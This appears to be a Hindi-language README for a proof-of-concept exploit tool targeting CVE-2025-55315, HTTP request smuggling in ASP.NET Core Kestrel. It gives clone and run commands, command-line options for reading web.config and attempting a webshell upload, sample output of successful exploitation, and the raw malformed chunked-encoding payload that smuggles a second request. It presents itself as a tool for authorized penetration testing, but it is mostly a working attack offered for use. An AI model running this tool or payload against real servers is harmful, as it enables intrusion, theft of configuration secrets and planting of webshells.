
CVE-2025-55315 PoC शोषण
ASP.NET Core Kestrel के लिए HTTP अनुरोध तस्करी शोषण उपकरण
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है!
CVE-2025-55315 (ASP.NET Core Kestrel HTTP अनुरोध तस्करी भेद्यता) के लिए व्यावसायिक पैठ परीक्षण उपकरण। यह उपकरण व्यापक शोषण क्षमताओं के साथ एकल-लक्ष्य विश्लेषण के लिए डिज़ाइन किया गया है।
ASP.NET Core Kestrel वेब सर्वर में एक गंभीर HTTP अनुरोध तस्करी भेद्यता (CVSS 9.9/10) जो हमलावरों को अनुमति देती है:
प्रभावित संस्करण:
# Python 3.7 या उच्चतर
python3 --version
# कोई बाहरी निर्भरता नहीं - केवल मानक लाइब्रेरी का उपयोग करता है
# टूल को क्लोन या डाउनलोड करें
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# निष्पादन योग्य बनाएं
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
यह करेगा:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
परिदृश्य: जाँचें कि प्रोडक्शन सर्वर असुरक्षित है या नहीं
python3 cve_2025_55315_PoC.py -t api.mycompany.com
अपेक्षित अवधि: 30-60 सेकंड
परिदृश्य: वर्बोज़ आउटपुट के साथ व्यापक एंडपॉइंट स्कैन
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
अपेक्षित अवधि: 2-5 मिनट
परिदृश्य: विशिष्ट महत्वपूर्ण एंडपॉइंट का परीक्षण
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
परिदृश्य: आंतरिक HTTP सर्वर का परीक्षण
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
अनिवार्य तर्क:
-t, --target लक्ष्य होस्टनाम या URL (जैसे, target.com)
वैकल्पिक तर्क:
-p, --port पोर्ट नंबर (डिफ़ॉल्ट: SSL के लिए 443, गैर-SSL के लिए 80)
-e, --endpoint परीक्षण करने के लिए विशिष्ट एंडपॉइंट (एकाधिक बार उपयोग किया जा सकता है)
--no-ssl SSL/HTTPS अक्षम करें (HTTP का उपयोग करें)
--read-config web.config फ़ाइल पढ़ने का प्रयास करें
--upload-shell वेबशेल अपलोड का प्रयास करें (पुष्टि आवश्यक)
-o, --output रिपोर्ट को फ़ाइल में सहेजें
-v, --verbose वर्बोज़ आउटपुट सक्षम करें
--timeout सेकंड में सॉकेट टाइमआउट (डिफ़ॉल्ट: 10)
-h, --help सहायता संदेश दिखाएँ
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
व्याख्या:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
व्याख्या:
यह उपकरण चलाने से पहले, सुनिश्चित करें:
यह उपकरण दुर्भावनापूर्ण चंकड ट्रांसफर एन्कोडिंग का उपयोग करके CVE-2025-55315 का शोषण करता है:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← भेद्यता: \r\n के बजाय अकेला \n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← यह एक अलग अनुरोध बन जाता है
Host: target.com
यह क्यों काम करता है:
\n को लाइन टर्मिनेटर के रूप में देखता है → इसे एकल अनुरोध के रूप में संसाधित करता है\n को अनदेखा करता है → तस्करी किए गए GET को एक अलग अनुरोध के रूप में मानता है